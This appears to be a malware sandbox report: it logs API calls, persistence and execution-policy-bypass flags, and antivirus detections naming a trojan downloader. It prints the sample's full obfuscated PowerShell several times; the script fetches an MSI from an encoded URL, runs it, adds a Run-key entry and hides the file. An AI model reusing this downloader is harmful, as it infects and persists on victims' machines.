process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02801000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02802000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02803000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02804000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
cmdline powershell.exe -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
cmdline powershell.exe -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\iJOtPBQ reg_value C:\Users\test22\AppData\Roaming\ONHQNHFT.msi
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\ONHQNHFT.msi
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
CTX vba.trojan.generic
Skyhigh VBS/Downloader.acl
Arcabit Trojan.Generic.D4770615
Symantec Scr.Malscript!gen11
ESET-NOD32 VBS/TrojanDownloader.Agent.XAO
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Trojan.GenericKD.74909205
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan Trojan.GenericKD.74909205
Emsisoft Trojan.GenericKD.74909205 (B)
DrWeb Trojan.DownLoader47.53219
Ikarus Trojan-Downloader.VBS.Agent
FireEye Trojan.GenericKD.74909205
Jiangmin Trojan.Script.amhb
Google Detected
Kingsoft hta.Troj.2024093
Microsoft Trojan:HTA/Malgent!MSR
ViRobot HTML.Z.Agent.22114
GData HTML.Trojan.Agent.BCOUUH
Varist VBS/Agent.AZR!Eldorado
McAfee VBS/Downloader.acl
Tencent Vbs.Trojan-Downloader.Der.Udkl
huorong TrojanDownloader/VBS.Maloader.n
Fortinet VBS/Agent.UQJ!tr
AVG Script:SNH-gen [Trj]
alibabacloud Trojan[downloader]:Win/Generic.Gen